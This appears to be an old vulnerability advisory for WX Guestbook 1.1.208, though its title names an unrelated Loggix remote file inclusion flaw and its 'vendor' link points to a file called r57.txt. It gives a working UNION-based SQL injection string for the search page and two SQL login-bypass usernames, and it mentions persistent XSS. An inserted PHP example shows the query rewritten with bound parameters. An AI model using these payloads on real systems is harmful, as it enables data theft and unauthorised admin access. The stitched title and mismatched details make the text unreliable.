Loggix Project <= 9.4.5 Multiple Remote File Inclusion Vulnerabilities

###########################################
#	WX Guest Book 1.1.208 Vulns	  #
#	By xxHackerXzX hacker from nepal	  #
#	admin@ekin0x.comm	 #
###########################################

Product name: WX Guestbook 1.1.208
Product vendor: http://www.ekin0x.com/r57.txt

This product suffers from multiple SQL injection and persistent XSS vulnerabilities.

##############  SQL Search Vuln  ###############

The search parameters submitted to search.php are not sanitized, so the search query can be used for SQL injection against the server.

SQL query:
$signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");

$QUERY is the text submitted through the search box, so SQL placed in it is executed by the database server.
The following is a sample SQL injection string.

Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*

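A hardened form of the search query above, as an added example that is not part of the original advisory or of WX Guestbook: the search term is bound as a parameter and LIKE wildcards are escaped, so the sample string is treated as plain text. The table and column names come from the quoted query; PDO, the in-memory SQLite database, the `!` escape character and the function names are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Added example, not WX Guestbook code. Table and column names come from the
// query in the advisory; PDO and the in-memory SQLite database are assumptions
// (the product itself calls its own DB_Execute() wrapper).

/** Escape LIKE wildcards so the search term is matched literally. */
function escape_like(string $term): string
{
    // '!' must be handled first so the escapes added for % and _ survive.
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
}

/** Search entries with the term bound as data, never spliced into the SQL. */
function search_signs(PDO $pdo, string $query): array
{
    $stmt = $pdo->prepare(
        "SELECT * FROM `wxgb_signs` WHERE `sign` LIKE :pattern ESCAPE '!' ORDER BY `code` DESC"
    );
    $stmt->execute([':pattern' => '%' . escape_like($query) . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE `wxgb_signs` (`code` INTEGER PRIMARY KEY, `sign` TEXT)');
$insert = $pdo->prepare('INSERT INTO `wxgb_signs` (`sign`) VALUES (?)');
foreach (['test entry', 'another test', '100% great site'] as $text) {
    $insert->execute([$text]);
}

// An ordinary search matches the entries that contain the term.
var_dump(count(search_signs($pdo, 'test')));

// The advisory's sample search string is now only a literal substring to look
// for; it cannot close the quote or append a UNION to the statement.
$payload = "test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*";
var_dump(count(search_signs($pdo, $payload)));

// A bare wildcard is matched as a literal percent sign, not as "every row".
var_dump(count(search_signs($pdo, '%')));
```
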
##############  SQL login bypass  ###############
The username and password fields are not sanitized, so the login system can be bypassed.

Username: admin'))/*
Password: learn3r  [or whatever]

Or

Username: ')) or 1=1/*
Password: learn3r  [or whatever]

##############  Persistent XSS Vulns  ##############

In the name field (I suppose as I don't understand Arabic), you can inject XSS...

 
